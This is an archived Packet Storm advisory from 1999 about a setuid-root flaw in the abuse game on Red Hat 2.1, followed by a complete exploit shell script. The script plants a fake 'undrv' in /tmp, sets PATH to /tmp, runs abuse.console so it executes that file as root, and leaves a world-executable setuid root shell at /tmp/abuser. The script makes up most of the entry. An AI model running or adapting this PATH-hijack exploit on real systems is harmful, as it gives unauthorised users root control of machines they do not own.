Packet Storm, PACKETSTORM:15084
Aug 17, 1999 - 12:00 a.m.

abuseconsole.sh

` There is a security hole in Red Hat 2.1, which installs the game abuse with  
/usr/lib/games/abuse/abuse.console suid root. The abuse.console program  
loads its files without absolute pathnames, assuming the user is running  
abuse from the /usr/lib/games/abuse directory. One of these files is the  
undrv program, which abuse executes as root. If the user is not in the  
abuse directory when running this, an arbitrary program can be substituted  
for undrv, allowing the user to execute arbitrary commands as root.  
If abuse.console needs to be run by users other than root at the console,  
provisions need to be made in the code to not execute or load any files  
as root.  
  
Program: /usr/lib/games/abuse/abuse.console suid root  
Affected Operating Systems: Red Hat 2.1 linux distribution  
Requirements: account on system  
Patch: chmod -s /usr/lib/games/abuse/abuse.console  
Security Compromise: root  
Author: Dave M. ([email protected])  
Synopsis: abuse.console runs undrv without an absolute  
pathname while executing as root, allowing  
a user to substitute the real undrv with   
an arbitrary program.  
  
Exploit:  
#!/bin/sh  
#  
# abuser.sh  
# exploits a security hole in abuse to create  
# a suid root shell /tmp/abuser on a linux  
# Red Hat 2.1 system with the games package   
# installed.  
#  
# For release 2/2/96 - 1 drink credit please.  
#  
# by Dave M. ([email protected])  
#  
echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system  
echo ================ Checking system vulnerability  
if test -u /usr/lib/games/abuse/abuse.console  
then  
echo ++++++++++++++++ System appears vulnerable.  
cd /tmp  
cat << _EOF_ > /tmp/undrv  
#!/bin/sh  
/bin/cp /bin/sh /tmp/abuser  
/bin/chmod 4777 /tmp/abuser  
_EOF_  
cat << _EOF_ >> /tmp/the_wall  
so ya thought ya might like to go to the show  
to feel the warm thrill of confusion that space cadet glow  
tell me is something eluding you sunshine?  
is this not what you expected to see?  
if you wanna find out what's behind these cold eyes  
you'll just have to claw your way through this disguise  
_EOF_  
chmod +x /tmp/undrv  
PATH=/tmp  
echo ================ Executing Abuse  
/usr/lib/games/abuse/abuse.console  
/bin/rm /tmp/undrv  
/bin/rm /tmp/the_wall  
if test -u /tmp/abuser  
then  
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser  
else  
echo ---------------- Exploit failed  
fi  
else  
echo ---------------- This machine does not appear to be vulnerable.  
fi  
  
`